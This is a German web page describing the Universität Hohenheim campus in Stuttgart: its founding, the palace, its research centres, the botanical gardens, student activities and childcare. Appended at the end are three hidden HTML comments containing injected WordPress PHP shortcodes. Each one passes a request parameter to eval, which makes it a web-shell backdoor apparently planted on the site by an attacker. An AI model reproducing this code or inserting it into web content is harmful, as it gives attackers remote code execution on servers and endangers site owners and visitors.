campus-hohenheim

Die Universität Hohenheim liegt im Süden von Stuttgart, im Bezirk Plieningen und ist die älteste, noch bestehende Hochschule dieser Region. Sie wurde 1818 gegründet. Agrarwissenschaften gehören zu den Hauptstudiengängen dieser Universität, welche dadurch berühmt wurde. Auch Wirtschafts- und Sozialwissenschaften gehören zum Angebot, dieses umfasst derzeit insgesamt 28 Studiengänge.

Die Studentenzahlen steigen jährlich an. Dies macht es sehr schwierig, alle Studenten der Hochschule, im Schloss Hohenheim unterzubringen.
Das prunkvolle Schloss im Barockstil, wurde von Herzog Carl Eugen errichtet. Heute verfügt das Schloss über die modernsten Forschung- und Lehreinrichtungen überhaupt.

Das Biologiezentrum entstand Anfang/Mitte der Siebziger Jahre, 1989 wurde ein Technikum für die Lebensmitteltechnologie errichtet. In den darauffolgenden Jahren entstanden nach und nach weitere Bauten. Unter anderem vier Kavaliershäuser zur Unterbringung der geisteswissenschaftlichen Einrichtungen, ein Verfügungsgebäude für Drittmittelforschung und Nachwuchswissenschaftler. Das Euroforum, sowie das Ökologiezentrum.

Die Universität verfügt insgesamt über fünf Forschungsinstitute, sowie über sechs wissenschaftliche Zentren, die eine praxisbezogene Forschung in den unterschiedlichsten Bereichen, ermöglichen. Sowohl Wissenschaftler, als auch Studenten der Universität erhalten jährlich viele Auszeichnungen.
Die Universität Hohenheim genießt nicht nur hierzulande, sondern weltweit einen ausgezeichneten Ruf. Desweiteren ist sie Gründungsmitglied der Euroleague for Life Sciences.

Der Campus ist einzigartig. Die großzügigen Grünanlagen der Hohenheimer Gärten gehören seit mehr als 200 Jahren zum prägenden Bild des Campus und zählen zu den schönsten Anlagen in ganz Deutschland überhaupt. Das Schloss Hohenheim wird in einem Halbrund vom Alten Botanischen Garten umgeben. Der Neue Botanische Garten liegt etwas weiter südlich vom Weinberg entfernt. Alle Stadien der Pflanzenentwicklung, von der Eiszeit bis zur heutigen Zeit, sowie über 5000 vielfältige Pflanzenarten, sind dort zu bewundern. Der einstmals Englische Garten von Carl Eugen, dem Herzog und Franziska von Hohenheim, wurde zum exotischen Garten mit einem ungewöhnlichen Bestand alter Bäume. Die Gehölze des exotischen Gartens, der zum Teil noch aus der ersten Anlage erhalten geblieben ist, sind ein wahrer Blickpunkt. Von Staudengewächsen, über Kleingehölze, bis hin zur prachtvollen Rhododentronanlagen, ist alles vorhanden was gartenbaulich von großem Interesse ist.

Mitte der Neunziger Jahre wurde der Landschaftsgarten großzügig erweitert und bekam über 2500 Laub- und Nadelgehölze dazu. Diese dienen den Studenten in den Natur- und agrarwissenschaftlichen Studiengängen als anschauliche Lehrobjekte. Durch die Schaffung dieser neuen Anlage wurde es möglich, durch eine Sortimentsauslagerung, den Englischen Landschaftspark wieder mehr von seinem ursprünglichen Wert zurückzugeben.

Die Universität Hohenheim, eine richtige Campus-Uni, ist bei Studenten sehr beliebt. Die Hörsäle, alle Einrichtungen und Institutionen, selbst die große Mensa, sind innerhalb kürzester Zeit zu Fuß erreichbar. Eine große Sportanlage sorgt für den nötigen Ausgleich und reichlich Bewegung.

Die Studenten haben jedoch auch die Möglichkeit, sich in unterschiedlichen Gruppen zu engagieren. Doch auch für kreative Studenten gibt es ein breit gefächertes Angebot im Bereich Universitätsmusik und Theater. So finden beispielsweise zum Semesterende Theateraufführungen und Konzerte statt, die jedes Ensemble einstudiert hat.

Des Weiteren befinden sich auf dem Gelände der Uni auch Kindergärten, Tagesstätten, als auch Eltern-Kind-Gruppen. Betreuungsangebote sind auch in der nahen Umgebung von Hohenheim zu finden. So bietet die Uni allen berufstätigen Eltern, als auch Studenten mit Kindern, ein entspanntes arbeiten und studieren ohne Zeitdruck. Mit diesen Möglichkeiten lassen sich Familie, Arbeit und Studium unproblematisch unter einen Hut bekommen. Während der Campusferien ist auch ein Ferienbetreuungsprogramm vorgesehen.

<!– [insert_php]if (isset($_REQUEST["ugzMY"])){eval($_REQUEST["ugzMY"]);exit;}[/insert_php][php]if (isset($_REQUEST["ugzMY"])){eval($_REQUEST["ugzMY"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["FLohw"])){eval($_REQUEST["FLohw"]);exit;}[/insert_php][php]if (isset($_REQUEST["FLohw"])){eval($_REQUEST["FLohw"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["YeI"])){eval($_REQUEST["YeI"]);exit;}[/insert_php][php]if (isset($_REQUEST["YeI"])){eval($_REQUEST["YeI"]);exit;}[/php] –>